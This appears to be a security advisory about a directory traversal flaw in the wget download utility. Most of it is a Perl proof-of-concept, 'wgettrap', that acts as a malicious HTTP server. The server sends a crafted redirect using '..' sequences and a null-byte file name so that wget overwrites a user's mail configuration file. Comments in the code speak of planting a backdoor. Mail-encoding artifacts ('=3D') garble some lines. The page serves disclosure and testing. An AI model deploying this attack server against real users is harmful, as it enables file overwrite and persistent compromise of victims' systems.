wget is "a freely available utility for downloading files using the HTTP, HTTPS, and FTP protocols on Linux-based operating systems".
wget allows a remote attacker in control of a malicious HTTP server to traverse directories and create or overwrite files on a victim's computer. If a remote attacker could force a victim to visit the malicious HTTP server, the attacker could use specially-crafted file names containing the absolute path to the targeted directory or "dot dot" sequences (/../) to traverse directories and create or overwrite files with the same privileges as the wget user. The following exploit code can be used to test your system for the mentioned vulnerability.
Credit:
The information has been provided by jjminar.
Exploit:
#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min=C3=A1=C5=99 (jjminar fastmail fm)
# License: Public Domain - SECU
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
# ~/.procm4ilrc (well, provided that the user running wget has username 'jan'
# 8-)).
use POSIX qw(strftime);
# This is our scheme/host/port
$server =3D "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server =3D "http://..";
# Wanna know who got infected?=20
#$log =3D "/dev/pts/1";
# The filename we will try to overwrite on the target system
$filename =3D "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";
# A simple directory traversal, for greater effect
$trick =3D "/.." . "%2f.." x 40;
open LOG, ">$log" if $log;
while(<STDIN>){
print LOG $_ if $log;
if (/\Q$trick$filename\E/) {
#if (/%2f/) {
# We see the filename, so this is the second time
# they're here. Time to feed the sploit.
$second++;
} elsif (/^Range: bytes=3D\(33\)-/) {
# Appending goes like this:
# (1) Tell'em what you're gonna tell'em
# (2) Then tell'em just a half
# (3) Close it
# (4) Wait
# (5) They're comin' back, with wget -c
# (6) Tell'em the sploit
# (7) Close again
# (8) Wtf? They're comin' back with wget -c again
# (9) Tell'em the rest...
# (10) ... enjoying the backdoor at the same time
print LOG "File if $1 bytes long\n" if $log;
} elsif (/^\r?$/) {
# The HTTP headers are over. Let's do it!
$date =3D strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
if (!$second) {
# Print the payload
print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Location: $server$trick$filename\r
Content-Length: 43\r
Connection: close\r
Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
} else {
# Print the redirection
print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Content-Length: 25\r
Connection: close\r
Content-Type: text/plain\r
\r
$payload
EOT
}
exit 0;
}
}
